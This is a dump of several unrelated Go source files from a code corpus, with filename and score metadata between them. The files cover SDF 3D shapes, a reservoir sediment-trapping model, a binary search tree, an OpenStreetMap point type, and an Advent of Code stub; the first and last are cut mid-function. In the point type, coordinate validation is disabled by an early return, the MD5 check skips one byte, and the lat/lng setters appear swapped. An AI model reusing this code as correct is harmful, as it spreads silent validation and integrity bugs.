	return Round(ro, Cylinder(h-shrink, r-ro))
}
// Capsule builds a capsule-like solid of length h with end radii r1 and
// r2 by revolving a 2D stadium profile and re-orienting it along Z.
func Capsule(h, r1, r2 float64) SDF3 {
	return TranslateZ(-r2, RotateX(-90, Revolve(0, Stadium(h, r1, r2))))
}
// SDFTorus is a torus in the XZ plane; V holds {major radius, tube radius}.
type SDFTorus struct {
	V Vec2
}

// SDF returns the exact torus distance (sdTorus from the iquilezles.org
// reference): the distance from the ring of radius V.X in the XZ plane,
// minus the tube radius V.Y.
func (s SDFTorus) SDF() func(Vec3) float64 {
	return func(pos Vec3) float64 {
		q := V2(len2(V2(pos.X, pos.Z))-s.V.X, pos.Y)
		return len2(q) - s.V.Y
	}
}

// Sphere bounds the torus by major radius + tube radius.
func (s SDFTorus) Sphere() (Vec3, float64) {
	return Zero3, s.V.X + s.V.Y
}

// Torus builds a torus from outer radius x and inner radius y: the tube
// diameter is w = x - y, so the major radius is x - w/2 and the tube
// radius is w/2.
func Torus(x, y float64) SDF3 {
	w := x - y
	return SDFTorus{Vec2{x - w/2, w / 2}}
}
// SDFCone is a capped cone. X, Y hold the sin/cos of the cone angle
// (precomputed by Cone) and H, R the height and base radius, used for
// the bounding sphere.
type SDFCone struct {
	X, Y, H, R float64
}

// SDF returns the signed distance to the cone in its local frame
// (apex at the origin, opening toward -Z; Cone re-centers it).
func (s SDFCone) SDF() func(Vec3) float64 {
	return func(pos Vec3) float64 {
		q := V2(len2(V2(pos.X, pos.Y)), pos.Z)
		d1 := -pos.Z - s.H                      // distance below the base cap
		d2 := max(dot2(q, V2(s.X, s.Y)), pos.Z) // distance to the slanted side / apex plane
		return len2(max2(V2(d1, d2), Zero2)) + min(max(d1, d2), 0.0)
	}
}

// Sphere returns a bounding sphere large enough for height and radius.
func (s SDFCone) Sphere() (Vec3, float64) {
	return Zero3, sqrt(s.H*s.H + s.R*s.R)
}

// Cone builds a cone of height h and base radius r, centered on Z.
func Cone(h, r float64) SDF3 {
	rad := math.Atan(h / r)
	return TranslateZ(h/2, SDFCone{math.Sin(rad), math.Cos(rad), h, r})
}

// TriPrism builds a triangular prism of height h and width/depth w by
// extruding a triangle and rotating it upright.
func TriPrism(h, w float64) SDF3 {
	return TranslateZ(-h/2, RotateX(-90, Extrude(w, Triangle(
		V2(0, h), V2(-w/2, 0), V2(w/2, 0),
	))))
}

// Pyramid builds a square pyramid as the intersection of two
// perpendicular triangular prisms.
func Pyramid(h, w float64) SDF3 {
	prism := TriPrism(h, w)
	return Intersection(prism, RotateZ(90, prism))
}
// SDFRounded offsets another SDF outward by Radius, rounding edges.
type SDFRounded struct {
	Radius float64
	SDF3
}

// SDF subtracts Radius from the wrapped distance field.
func (s SDFRounded) SDF() func(Vec3) float64 {
	sdf := s.SDF3.SDF()
	return func(pos Vec3) float64 {
		return sdf(pos) - s.Radius
	}
}

// Sphere grows the wrapped bounding sphere by Radius.
func (s SDFRounded) Sphere() (Vec3, float64) {
	center, radius := s.SDF3.Sphere()
	return center, radius + s.Radius
}

// Round wraps sdf so its surface is offset outward by radius.
func Round(radius float64, sdf SDF3) SDF3 {
	return SDFRounded{radius, sdf}
}

// SDFHollow turns a solid into a shell of the given Thickness around
// its original surface.
type SDFHollow struct {
	Thickness float64
	SDF3
}

// SDF returns the absolute wrapped distance minus Thickness, keeping
// only points within Thickness of the original surface.
func (s SDFHollow) SDF() func(Vec3) float64 {
	sdf := s.SDF3.SDF()
	return func(pos Vec3) float64 {
		return abs(sdf(pos)) - s.Thickness
	}
}

// Sphere returns the wrapped bounding sphere unchanged.
// NOTE(review): the shell extends Thickness beyond the original
// surface, so radius+Thickness may be the safer bound — confirm.
func (s SDFHollow) Sphere() (Vec3, float64) {
	center, radius := s.SDF3.Sphere()
	return center, radius
}

// Hollow wraps sdf as a shell of the given thickness.
func Hollow(thickness float64, sdf SDF3) SDF3 {
	return SDFHollow{thickness, sdf}
}
// SDFElongate stretches another SDF along each axis by clamping the
// sample point into the box [-H, H] first; H holds half-extents.
type SDFElongate struct {
	H Vec3
	SDF3
}

// SDF samples the wrapped field at the point shifted by its clamped
// position, which stretches the shape by 2*H on each axis.
func (s SDFElongate) SDF() func(Vec3) float64 {
	sdf := s.SDF3.SDF()
	return func(pos Vec3) float64 {
		return sdf(sub3(pos, clamp3(pos, neg3(s.H), s.H)))
	}
}

// Sphere grows the wrapped bounding sphere by the elongation extent.
func (s SDFElongate) Sphere() (Vec3, float64) {
	center, radius := s.SDF3.Sphere()
	return center, radius + s.H.Length()
}

// Elongate stretches sdf by the full amounts x, y, z.
func Elongate(x, y, z float64, sdf SDF3) SDF3 {
	return SDFElongate{Vec3{x / 2, y / 2, z / 2}, sdf}
}

// SDFRepeat tiles another SDF on a finite grid: Count repetitions in
// each direction, spaced by Offset.
type SDFRepeat struct {
	Count  Vec3
	Offset Vec3
	SDF3
}

// SDF maps the sample point into the nearest grid cell (limited to
// Count repetitions) before sampling the wrapped field.
func (s SDFRepeat) SDF() func(Vec3) float64 {
	sdf := s.SDF3.SDF()
	count := s.Count
	offset := s.Offset
	return func(p Vec3) float64 {
		return sdf(sub3(p, mul3(
			clamp3(
				round3(
					div3(p, offset),
				),
				neg3(count),
				count,
			),
			offset,
		)))
	}
}

// Sphere returns a sphere large enough to cover all repetitions.
func (s SDFRepeat) Sphere() (Vec3, float64) {
	center, radius := s.SDF3.Sphere()
	x := (s.Offset.X + radius) * s.Count.X
	y := (s.Offset.Y + radius) * s.Count.Y
	z := (s.Offset.Z + radius) * s.Count.Z
	return center, V3(x, y, z).Length()
}

// Repeat tiles sdf cx/cy/cz times with spacing ox/oy/oz.
func Repeat(cx, cy, cz, ox, oy, oz float64, sdf SDF3) SDF3 {
	return SDFRepeat{Vec3{cx, cy, cz}, Vec3{ox, oy, oz}, sdf}
}
// SDFEllipsoid is an axis-aligned ellipsoid with semi-axes R.
type SDFEllipsoid struct {
	R Vec3
}

// SDF returns an approximate (bound, not exact) signed distance using
// the scaled-gradient estimate k0*(k0-1)/k1.
func (s SDFEllipsoid) SDF() func(Vec3) float64 {
	return func(p Vec3) float64 {
		r := s.R
		k0 := len3(div3(p, r))
		k1 := len3(div3(p, mul3(r, r)))
		return k0 * (k0 - 1.0) / k1
	}
}

// Sphere returns a bounding sphere.
// NOTE(review): twice the largest semi-axis is conservative; the
// largest semi-axis alone already bounds the ellipsoid — confirm intent.
func (s SDFEllipsoid) Sphere() (Vec3, float64) {
	return Zero3, max(s.R.X, max(s.R.Y, s.R.Z)) * 2
}
func Ellipsoid(x, y, z float64) SDF3 {
return SDFEllipsoid{Vec3{x, y, z}}
} | sdf3.go | 0.714827 | 0.441131 | sdf3.go | starcoder |
package storage
import (
"math"
"github.com/flowmatters/openwater-core/data"
"github.com/flowmatters/openwater-core/util/m"
)
/* OW-SPEC
StorageParticulateTrapping:
inputs:
inflowLoad: kg.s^-1
inflow: m^3.s^-1
outflow: m^3.s^-1
storage: m^3
states:
storedMass: kg
parameters:
DeltaT: '[1,86400] Timestep, default=86400'
reservoirCapacity:
reservoirLength: 'Length (m) of reservoir from dam wall to longest impounded water at dam capacity'
subtractor: 'default=112'
multiplier: 'default=800'
lengthDischargeFactor:
lengthDischargePower:
outputs:
trappedMass: kg
outflowLoad: kg.s^-1
implementation:
function: storageParticulateTrapping
type: scalar
lang: go
outputs: params
init:
zero: true
lang: go
tags:
storage, sediment
*/
// storageParticulateTrapping models sediment trapping in a reservoir.
// For each timestep it computes the trapped percentage of the incoming
// particulate load (via a sedimentation index), accumulates the
// untrapped remainder in storage, and emits an outflow load based on
// the fully-mixed storage concentration. Returns the final stored
// mass (kg).
func storageParticulateTrapping(inflowMass, storageInflow, storageOutflow, storageVolume data.ND1Float64, // inputs
	initialStoredMass float64,
	deltaT, reservoirCapacity, reservoirLength, subtractor, multiplier, lengthDischargeFactor, lengthDischargePower float64,
	trappedMass, outflowLoad data.ND1Float64) (storedMass float64) {
	storedMass = initialStoredMass
	n := inflowMass.Len1()
	idx := []int{0} // reused index buffer for the 1-D series accessors
	for i := 0; i < n; i++ {
		idx[0] = i
		incomingMass := inflowMass.Get(idx) * deltaT // kg/s -> kg per timestep
		inflowRate := storageInflow.Get(idx)
		damTrappingPC := 0.0
		if (inflowRate > 0) && (reservoirLength > 0) {
			// Sedimentation index: capacity^2 / (factor * length * inflow^2).
			sedimentationIndex := math.Pow(reservoirCapacity, 2.0) / (lengthDischargeFactor * reservoirLength * math.Pow(inflowRate, 2.0))
			damTrappingPC = subtractor - (multiplier * math.Pow(sedimentationIndex, lengthDischargePower))
			// Trapping percentage is clamped to [0, 100].
			damTrappingPC = m.MinFloat64(100.0, m.MaxFloat64(0.0, damTrappingPC))
		}
		dailyTrappedConstituentLoad := incomingMass * damTrappingPC / 100.0
		trappedMass.Set(idx, dailyTrappedConstituentLoad)
		// Untrapped mass joins storage. NOTE(review): storedMass is never
		// reduced by the outflow computed below — confirm that is intended.
		storedMass = storedMass + incomingMass - dailyTrappedConstituentLoad
		concentration := storedMass / storageVolume.Get(idx) // kg/m^3
		massOutRate := storageOutflow.Get(idx) * concentration
		outflowLoad.Set(idx, massOutRate)
	}
	return
} | models/storage/sediment_trapping.go | 0.621081 | 0.430267 | sediment_trapping.go | starcoder |
package main
import (
"errors"
"fmt"
)
// main demonstrates the binary search tree: builds a tree rooted at 8,
// inserts 1-7, deletes 5 and 7, then prints the remaining values in
// order followed by the current minimum and maximum.
func main() {
	t := &TreeNode{value: 8}
	t.Insert(1)
	t.Insert(2)
	t.Insert(3)
	t.Insert(4)
	t.Insert(5)
	t.Insert(6)
	t.Insert(7)
	t.Delete(5)
	t.Delete(7)
	t.PrintInOrder()
	fmt.Println("")
	fmt.Printf("min is %d\n", t.FindMin())
	fmt.Printf("max is %d\n", t.FindMax())
}
// TreeNode represents a node in a binary search tree.
type TreeNode struct {
	value int
	left  *TreeNode
	right *TreeNode
}

// Insert adds value to the subtree rooted at n. It reports an error
// when the receiver is nil (empty tree) or the value already exists.
func (n *TreeNode) Insert(value int) error {
	if n == nil {
		return errors.New("tree is empty")
	}
	switch {
	case value == n.value:
		return errors.New("this node value already exists")
	case value < n.value:
		if n.left == nil {
			n.left = &TreeNode{value: value}
			return nil
		}
		return n.left.Insert(value)
	default:
		if n.right == nil {
			n.right = &TreeNode{value: value}
			return nil
		}
		return n.right.Insert(value)
	}
}

// Find looks up value in the subtree and returns a copy of the
// matching node plus a flag indicating whether it was found.
func (n *TreeNode) Find(value int) (TreeNode, bool) {
	if n == nil {
		return TreeNode{}, false
	}
	if value == n.value {
		return *n, true
	}
	if value < n.value {
		return n.left.Find(value)
	}
	return n.right.Find(value)
}

// FindMin returns the smallest value in the subtree (leftmost node).
func (n *TreeNode) FindMin() int {
	cur := n
	for cur.left != nil {
		cur = cur.left
	}
	return cur.value
}

// FindMax returns the largest value in the subtree (rightmost node).
func (n *TreeNode) FindMax() int {
	cur := n
	for cur.right != nil {
		cur = cur.right
	}
	return cur.value
}
// Delete removes a value from the tree.
func (treeNode *TreeNode) Delete(value int) {
	treeNode.remove(value)
}

// remove deletes value from the subtree and returns the (possibly new)
// subtree root. Standard BST deletion: leaves are dropped, nodes with
// one child are replaced by that child, and nodes with two children
// take the smallest value from their right subtree.
func (treeNode *TreeNode) remove(value int) *TreeNode {
	if treeNode == nil {
		return nil
	}
	if value < treeNode.value {
		treeNode.left = treeNode.left.remove(value)
		return treeNode
	}
	if value > treeNode.value {
		treeNode.right = treeNode.right.remove(value)
		return treeNode
	}
	// value == treeNode.value: this is the node to delete.
	if treeNode.left == nil && treeNode.right == nil {
		treeNode = nil
		return nil
	}
	if treeNode.left == nil {
		treeNode = treeNode.right
		return treeNode
	}
	if treeNode.right == nil {
		treeNode = treeNode.left
		return treeNode
	}
	// Two children: find the in-order successor (leftmost of the right subtree).
	smallestValOnRight := treeNode.right
	for {
		if smallestValOnRight != nil && smallestValOnRight.left != nil {
			smallestValOnRight = smallestValOnRight.left
		} else {
			break
		}
	}
	// Copy the successor's value here, then delete the successor below.
	treeNode.value = smallestValOnRight.value
	treeNode.right = treeNode.right.remove(treeNode.value)
	return treeNode
}
// PrintInOrder traverses the tree in order (left, node, right) and
// prints each value on its own line.
func (treeNode *TreeNode) PrintInOrder() {
	if treeNode == nil {
		return
	}
	treeNode.left.PrintInOrder()
	fmt.Println(treeNode.value)
	treeNode.right.PrintInOrder()
} | main.go | 0.730866 | 0.654011 | main.go | starcoder |
package iotmaker_geo_osm
import (
"bytes"
"crypto/md5"
"encoding/binary"
"errors"
"fmt"
"github.com/helmutkemper/gOsm/consts"
"github.com/helmutkemper/gOsm/utilMath"
"github.com/helmutkemper/mgo/bson"
log "github.com/helmutkemper/seelog"
"github.com/helmutkemper/zstd"
"io"
"io/ioutil"
"math"
"os"
"strconv"
)
// point struct based on osm file
type PointStt struct {
Id int64 `bson:"id"`
// Array de localização geográfica.
// [0:x:longitude,1:y:latitude]
// Este campo deve obrigatoriamente ser um array devido a indexação do MongoDB
Loc [2]float64 `bson:"loc"`
Rad [2]float64 `bson:"rad"`
Visible bool `bson:"visible"`
// Tags do Open Street Maps
// As Tags contêm _todo tipo de informação, desde como elas foram importadas, ao nome de um estabelecimento comercial,
// por exemplo.
Tag map[string]string `bson:"tag"`
// Dados do usuário
// Como o GO é fortemente tipado, eu obtive problemas em estender o struct de forma satisfatória e permitir ao usuário
// do sistema gravar seus próprios dados, por isto, este campo foi criado. Use-o a vontade.
Data map[string]string `bson:"data"`
// Node usado apenas para o parser do arquivo
GeoJSonFeature string `bson:"geoJSonFeature"`
Md5 [16]byte `bson:"md5" json:"-"`
Size int `bson:"size" json:"-"`
HasKeyValue bool `bson:"hasKeyValue" json:"-"`
}
// Return type PointStt as []PointStt to be used into gOsm-server project
func (el *PointStt) AsArray() []PointStt {
var returnLStt []PointStt = make([]PointStt, 1)
returnLStt[0] = *el
return returnLStt
}
func (el *PointStt) CopyFrom(pointABStt PointStt) {
el.Id = pointABStt.Id
el.Loc = pointABStt.Loc
el.Rad = pointABStt.Rad
el.Tag = pointABStt.Tag
el.Data = pointABStt.Data
el.Md5 = pointABStt.Md5
el.Size = pointABStt.Size
}
func (el *PointStt) GetIdAsByte() []byte {
var ret = make([]byte, 8)
binary.LittleEndian.PutUint64(ret, uint64(el.Id))
return ret
}
func (el *PointStt) MakeMD5() (error, []byte) {
var err error
var byteBSon []byte
el.Size = 0
el.Md5 = [16]byte{}
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err, []byte{}
}
el.Md5 = md5.Sum(byteBSon)
el.Size = len(byteBSon)
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err, []byte{}
}
return nil, byteBSon
}
func (el *PointStt) CheckMD5() error {
var err error
var byteBSon []byte
var md = el.Md5
el.Size = 0
el.Md5 = [16]byte{}
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err
}
el.Md5 = md5.Sum(byteBSon)
el.Size = len(byteBSon)
for i := 0; i != 15; i += 1 {
if el.Md5[i] != md[i] {
return errors.New("data integrity error")
}
}
return nil
}
func (el *PointStt) MakeGeoJSonFeature() string {
var geoJSon GeoJSon = GeoJSon{}
geoJSon.Init()
geoJSon.AddGeoMathPoint(strconv.FormatInt(el.Id, 10), el)
el.GeoJSonFeature, _ = geoJSon.StringLastFeature()
return el.GeoJSonFeature
}
// Set latitude and longitude as degrees
func (el *PointStt) SetLatLngDegrees(latitudeAFlt, longitudeAFlt float64) error {
el.Loc = [2]float64{longitudeAFlt, latitudeAFlt}
el.Rad = [2]float64{utilMath.DegreesToRadians(longitudeAFlt), utilMath.DegreesToRadians(latitudeAFlt)}
return el.checkBounds()
}
// fixme está estranho...
func (el *PointStt) SetLatLngDecimalDrees(latitudeDegreesAFlt, latitudePrimesAFlt, latitudeSecondsAFlt, longitudeDegreesAFlt, longitudePrimesAFlt, longitudeSecondsAFlt int64) {
el.Loc = [2]float64{float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0, float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0}
el.Rad = [2]float64{utilMath.DegreesToRadians(float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0), utilMath.DegreesToRadians(float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0)}
}
// fixme está estranho...
func (el *PointStt) SetLngLatDecimalDrees(longitudeDegreesAFlt, longitudePrimesAFlt, longitudeSecondsAFlt, latitudeDegreesAFlt, latitudePrimesAFlt, latitudeSecondsAFlt int64) {
el.Loc = [2]float64{float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0, float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0}
el.Rad = [2]float64{utilMath.DegreesToRadians(float64(latitudeDegreesAFlt) + float64(latitudePrimesAFlt)/60.0 + float64(latitudeSecondsAFlt)/3600.0), utilMath.DegreesToRadians(float64(longitudeDegreesAFlt) + float64(longitudePrimesAFlt)/60.0 + float64(longitudeSecondsAFlt)/3600.0)}
}
// Set longitude and latitude as degrees
func (el *PointStt) SetLngLatDegrees(longitudeAFlt, latitudeAFlt float64) error {
el.Loc = [2]float64{longitudeAFlt, latitudeAFlt}
el.Rad = [2]float64{utilMath.DegreesToRadians(longitudeAFlt), utilMath.DegreesToRadians(latitudeAFlt)}
return el.checkBounds()
}
// Set angle value as degrees
func (el *PointStt) SetXYDegrees(xAFlt, yAFlt float64) error {
el.Loc = [2]float64{xAFlt, yAFlt}
el.Rad = [2]float64{utilMath.DegreesToRadians(xAFlt), utilMath.DegreesToRadians(yAFlt)}
return el.checkBounds()
}
// Set latitude and longitude as radians
func (el *PointStt) SetLatLngRadians(latitudeAFlt, longitudeAFlt float64) error {
el.Loc = [2]float64{utilMath.RadiansToDegrees(longitudeAFlt), utilMath.RadiansToDegrees(latitudeAFlt)}
el.Rad = [2]float64{longitudeAFlt, latitudeAFlt}
return el.checkBounds()
}
func (el *PointStt) SetLatLngRadiansWithoutCheckingFunction(latitudeAFlt, longitudeAFlt float64) {
el.Loc = [2]float64{utilMath.RadiansToDegrees(longitudeAFlt), utilMath.RadiansToDegrees(latitudeAFlt)}
el.Rad = [2]float64{longitudeAFlt, latitudeAFlt}
}
// Set longitude and latitude as radians
func (el *PointStt) SetLngLatRadians(longitudeAFlt, latitudeAFlt float64) error {
el.Loc = [2]float64{utilMath.RadiansToDegrees(longitudeAFlt), utilMath.RadiansToDegrees(latitudeAFlt)}
el.Rad = [2]float64{longitudeAFlt, latitudeAFlt}
return el.checkBounds()
}
// Set angle value as radians
func (el *PointStt) SetXYRadians(xAFlt, yAFlt float64) error {
el.Loc = [2]float64{utilMath.RadiansToDegrees(xAFlt), utilMath.RadiansToDegrees(yAFlt)}
el.Rad = [2]float64{xAFlt, yAFlt}
return el.checkBounds()
}
// Get x ( longitude )
func (el *PointStt) GetXAsDegrees() float64 { return el.Loc[0] }
func (el *PointStt) GetXAsRadians() float64 { return el.Rad[0] }
// Get y ( latitude )
func (el *PointStt) GetYDegrees() float64 { return el.Loc[1] }
// Get y ( latitude )
func (el *PointStt) GetYRadians() float64 { return el.Rad[1] }
// Get angle as string
func (el *PointStt) ToRadiansString() string {
if len(el.Rad) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("(%1.5f,%1.5f)%v", el.Rad[0], el.Rad[1], consts.RADIANS)
}
// Get angle as string
func (el *PointStt) ToDegreesString() string {
if len(el.Loc) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("(%1.5f,%1.5f)%v", el.Loc[0], el.Loc[1], consts.DEGREES)
}
// Get latitude and longitude
func (el *PointStt) ToDecimalDegreesString() string {
dec := math.Abs(el.Loc[0])
degLng := math.Floor(dec)
minLng := math.Floor((dec - degLng) * 60.0)
secLng := (dec - degLng - (minLng / 60.0)) * 3600.0
if el.Loc[0] < 0 {
degLng *= -1
}
dec = math.Abs(el.Loc[1])
degLat := math.Floor(dec)
minLat := math.Floor((dec - degLat) * 60.0)
secLat := (dec - degLat - (minLat / 60.0)) * 3600.0
if el.Loc[1] < 0 {
degLat *= -1
}
return fmt.Sprintf("(%v%v%v%v%2.2f%v,%v%v%v%v%2.2f%v)", degLat, consts.DEGREES, minLat, consts.MINUTES, secLat, consts.SECONDS, degLng, consts.DEGREES, minLng, consts.MINUTES, secLng, consts.SECONDS)
}
func (el *PointStt) ToGoogleMapString() string {
if len(el.Loc) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("%1.5f, %1.5f [ Please, copy and past this value on google maps search ]", el.Loc[1], el.Loc[0])
}
func (el *PointStt) ToLeafletMapString() string {
if len(el.Loc) == 0 {
return fmt.Sprint("(NaN,NaN)")
}
return fmt.Sprintf("[%1.5f, %1.5f],", el.Loc[1], el.Loc[0])
}
// Return y coordinate as latitude
func (el PointStt) GetLatitudeAsDegrees() float64 { return el.Loc[1] }
func (el PointStt) GetLatitudeAsRadians() float64 { return el.Rad[1] }
// Return x coordinate as longitude
func (el PointStt) GetLongitudeAsDegrees() float64 { return el.Loc[0] }
// Return x coordinate as longitude
func (el PointStt) GetLongitudeAsRadians() float64 { return el.Rad[0] }
// checkBounds validates that latitude is within [-Pi/2, Pi/2] and
// longitude within [-Pi, Pi] radians.
// NOTE(review): the unconditional `return nil` below disables the
// validation entirely — both range checks are unreachable. Confirm
// whether this was a deliberate (temporary?) bypass before removing it.
func (el PointStt) checkBounds() error {
	return nil
	if el.GetLatitudeAsRadians() < consts.MIN_LAT || el.GetLatitudeAsRadians() > consts.MAX_LAT {
		return log.Criticalf("Error: Latitude must be < [math.Pi/2 rad|+90º] and > [-math.Pi/2 rad|-90º]. Value %v\n", el.ToRadiansString())
	}
	if el.GetLongitudeAsRadians() < consts.MIN_LON || el.GetLongitudeAsRadians() > consts.MAX_LON {
		return log.Criticalf("Error: Longitude must be < [math.Pi rad|+180º] and > [-math.Pi rad|-180º]. Value %v\n", el.ToRadiansString())
	}
	return nil
}
func (el PointStt) GetBoundingBox(distanceAStt DistanceStt) BoxStt {
return BoundingBox(el, distanceAStt)
}
func (el PointStt) GetDestinationPoint(distanceAStt DistanceStt, angleAStt AngleStt) PointStt {
return DestinationPoint(el, distanceAStt, angleAStt)
}
func (el PointStt) GetDirectionBetweenTwoPoints(pointBAStt PointStt) AngleStt {
return DirectionBetweenTwoPoints(el, pointBAStt)
}
func (el PointStt) GetDistanceBetweenTwoPoints(pointBAStt PointStt) DistanceStt {
return DistanceBetweenTwoPoints(el, pointBAStt)
}
func (el *PointStt) Add(pointBAStt PointStt) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]+pointBAStt.Loc[0], el.Loc[1]+pointBAStt.Loc[1])
return ret
}
func (el *PointStt) Sub(pointBAStt PointStt) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]-pointBAStt.Loc[0], el.Loc[1]-pointBAStt.Loc[1])
return ret
}
func (el *PointStt) Plus(valueAFlt64 float64) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]*valueAFlt64, el.Loc[1]*valueAFlt64)
return ret
}
func (el *PointStt) Div(valueAFlt64 float64) PointStt {
var ret PointStt = PointStt{}
ret.SetLngLatDegrees(el.Loc[0]/valueAFlt64, el.Loc[1]/valueAFlt64)
return ret
}
func (el *PointStt) Equality(pointBAStt PointStt) bool {
return el.Loc[0] == pointBAStt.Loc[0] && el.Loc[1] == pointBAStt.Loc[1]
}
func (el *PointStt) DotProduct(pointBAStt PointStt) float64 {
return el.Loc[0]*pointBAStt.Loc[0] + el.Loc[1]*pointBAStt.Loc[1]
}
func (el *PointStt) DistanceSquared(pointBAStt PointStt) float64 {
return (pointBAStt.Loc[0]-el.Loc[0])*(pointBAStt.Loc[0]-el.Loc[0]) + (pointBAStt.Loc[1]-el.Loc[1])*(pointBAStt.Loc[1]-el.Loc[1])
}
func (el *PointStt) Pythagoras(pointBAStt PointStt) float64 {
return math.Sqrt(el.DistanceSquared(pointBAStt))
}
// Distance returns the shortest planar distance from el to the line
// segment pointAAStt-pointBAStt, computed on raw lon/lat coordinates
// (not great-circle distance).
func (el *PointStt) Distance(pointAAStt, pointBAStt PointStt) float64 {
	var l2 float64 = pointAAStt.DistanceSquared(pointBAStt)
	if l2 == 0.0 {
		return el.Pythagoras(pointAAStt) // v == w case: segment degenerates to a point
	}
	// Consider the line extending the segment, parameterized as v + t (w - v)
	// We find projection of point p onto the line.
	// It falls where t = [(p-v) . (w-v)] / |w-v|^2
	var pA PointStt = el.Sub(pointAAStt)
	var pB PointStt = pointBAStt.Sub(pointAAStt)
	var t float64 = pA.DotProduct(pB) / l2
	if t < 0.0 {
		return el.Pythagoras(pointAAStt) // projection falls before endpoint A
	} else if t > 1.0 {
		return el.Pythagoras(pointBAStt) // projection falls after endpoint B
	}
	// Projection lies on the segment: measure to the projected point.
	var pC PointStt = pointBAStt.Sub(pointAAStt)
	pC = pC.Plus(t) // Plus performs scalar multiplication despite the name
	pC = pointAAStt.Add(pC)
	return el.Pythagoras(pC)
}
func (el *PointStt) DecisionDistance(pointsAAStt []PointStt) float64 {
var i int
var curDistance float64
var dst float64 = el.Pythagoras(pointsAAStt[0])
for i = 1; i < len(pointsAAStt); i += 1 {
curDistance = el.Pythagoras(pointsAAStt[i])
if curDistance < dst {
dst = curDistance
}
}
return dst
}
func (el *PointStt) IsContainedInTheList(pointsAAStt []PointStt) bool {
for _, point := range pointsAAStt {
if el.Equality(point) {
return true
}
}
return false
}
func (el *PointStt) ToExternalFile(file *os.File, typeId []byte) error {
var sizeByte = make([]byte, 8)
var byteBSon []byte
var err error
err, byteBSon = el.MakeMD5()
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
byteBSon, err = zstd.CompressLevel(nil, byteBSon, zstd.DefaultCompression)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
binary.LittleEndian.PutUint64(sizeByte, uint64(len(byteBSon)))
_, err = file.Write(typeId)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
_, err = file.Write(sizeByte)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
return err
}
_, err = file.Write(byteBSon)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
return err
}
func (el *PointStt) ToFilePath(filePath string) error {
var byteBSon []byte
var err error
err, byteBSon = el.MakeMD5()
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
}
err = ioutil.WriteFile(filePath, byteBSon, 0644)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
return err
}
func (el *PointStt) FromFilePath(filePath string) error {
var byteBSon []byte
var err error
byteBSon, err = ioutil.ReadFile(filePath)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
el.FromBSon(byteBSon)
return err
}
// RemoveFilePath deletes the file at filePath. It returns an error if
// the path cannot be stat'ed or refers to a directory rather than a
// regular file.
func (el *PointStt) RemoveFilePath(filePath string) error {
	fileInfo, err := os.Stat(filePath)
	if err != nil {
		return err
	}
	// Refuse to delete directories: this helper is for files only.
	// (The original check was inverted — it rejected files and let
	// directories through — and its message used an unformatted "%v".)
	if fileInfo.IsDir() {
		return fmt.Errorf("%v is a dir, not a file", filePath)
	}
	return os.Remove(filePath)
}
func (el *PointStt) ToBSon() (error, []byte) {
return el.MakeMD5()
}
func (el *PointStt) ToJSon() (error, []byte) {
var err error
var byteBSon []byte
el.Size = 0
el.Md5 = [16]byte{}
byteBSon, err = bson.Marshal(el)
if err != nil {
log.Criticalf("gOsm.geoMath.tmpPoint.error: %s", err.Error())
return err, []byte{}
}
el.Md5 = md5.Sum(byteBSon)
el.Size = len(byteBSon)
byteBSon, err = bson.MarshalJSON(el)
return err, byteBSon
}
func (el *PointStt) ToReader() io.Reader {
err, data := el.ToBSon()
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err)
}
return bytes.NewReader(data)
}
func (el *PointStt) FromBSon(in []byte) error {
return bson.Unmarshal(in, el)
}
func (el *PointStt) FromJSon(in []byte) error {
return bson.UnmarshalJSON(in, el)
}
func (el *PointStt) ToFile(file io.Writer) error {
_, err := io.Copy(file, el.ToReader())
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err.Error())
return err
}
return nil
}
func (el *PointStt) FromFile(file io.Reader) error {
var bytesLBty []byte
var bufferLObj *bytes.Buffer = bytes.NewBuffer(bytesLBty)
_, err := io.Copy(bufferLObj, file)
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err.Error())
return err
}
err = el.FromBSon(bufferLObj.Bytes())
if err != nil {
log.Criticalf("gOsm.geoMath.geoTypePolygon.error: %s", err.Error())
return err
}
return nil
} | typePoint.go | 0.627723 | 0.40031 | typePoint.go | starcoder |
package advent
import (
"strings"
. "github.com/davidparks11/advent2021/internal/advent/day12"
)
var _ Problem = &theTreacheryOfWhales{}
type passagePathing struct {
dailyProblem
}
func NewPassagePathing() Problem {
